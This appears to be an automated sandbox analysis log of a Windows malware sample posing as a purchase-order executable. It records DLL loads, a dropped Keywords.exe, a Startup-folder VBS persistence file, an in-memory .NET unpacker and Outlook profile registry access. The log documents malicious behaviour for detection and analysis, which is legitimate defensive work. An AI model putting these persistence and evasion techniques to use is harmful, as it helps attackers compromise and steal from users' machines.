Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PO_63738373663838____________________________________________________________________________.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO_63738373663838____________________________________________________________________________.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.000000000322D000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1316425818.0000000006D40000.00000004.08000000.00040000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1516774520.00000000043FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.000000000322D000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1316425818.0000000006D40000.00000004.08000000.00040000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1516774520.00000000043FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: PO_63738373663838____________________________________________________________________________.exe, PublisherPolicyAuth.cs	.Net Code: PrepareImporter
Source: PO_63738373663838____________________________________________________________________________.exe, CodeMapperSchema.cs	.Net Code: FindReg System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.4031d40.1.raw.unpack, PublisherPolicyAuth.cs	.Net Code: PrepareImporter
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.4031d40.1.raw.unpack, CodeMapperSchema.cs	.Net Code: FindReg System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.PO_63738373663838____________________________________________________________________________.exe.6c50000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Keywords.exe.46da600.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Keywords.exe.45f21e0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1315973231.0000000006C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1494831199.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1296947151.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1516774520.00000000046DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Keywords.exe PID: 8144, type: MEMORYSTR

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_075C7D31 push dword ptr [ebp-16FFFFFFh]; iretd	0_2_075C7D37
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_075C35AE push esi; retf	0_2_075C35B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017124B9 push 8BFFFFFFh; retf	7_2_017124BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C83181 push ebx; retf	7_2_05C83182
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0183A5BB push edx; ret	11_2_0183A5BE
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0183A493 push edx; ret	11_2_0183A49E
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0183472F push edx; ret	11_2_01834742
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0183A749 push edx; ret	11_2_0183A756
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0183A653 push ebx; ret	11_2_0183A656
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_07832EA7 pushad ; ret	11_2_07832EA8
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_078335AE push esi; retf	11_2_078335B1
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_07836DB8 push edi; ret	11_2_07836DB9
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_07837D31 push dword ptr [ebp-16FFFFFFh]; iretd	11_2_07837D37
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_07836237 push edi; ret	11_2_07836238
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0783218D push edi; ret	11_2_0783218E
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0783408B push edi; ret	11_2_0783408C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271D308 push esp; iretd	12_2_0271D316
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271C190 push ebp; iretd	12_2_0271C19E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271D610 push ebx; iretd	12_2_0271D61E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271D61B push ebx; iretd	12_2_0271D61E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_027116D8 push edx; iretd	12_2_027116E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_02710778 push ebp; iretd	12_2_02710782
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_027117C8 push edx; iretd	12_2_027117D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_027107B8 push ebp; iretd	12_2_027107C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271B4F2 push ebp; iretd	12_2_0271B4FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_027114A8 push edx; iretd	12_2_027114B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271CA31 push ebp; iretd	12_2_0271CA3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_02711A09 push ebx; iretd	12_2_02711A16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_02714AD9 push esp; iretd	12_2_02714AE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271BBD2 push ebp; iretd	12_2_0271BBDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_027118B8 push ebx; iretd	12_2_027118C6

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

File created: C:\Users\user\AppData\Roaming\Keywords.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs

Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs

Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
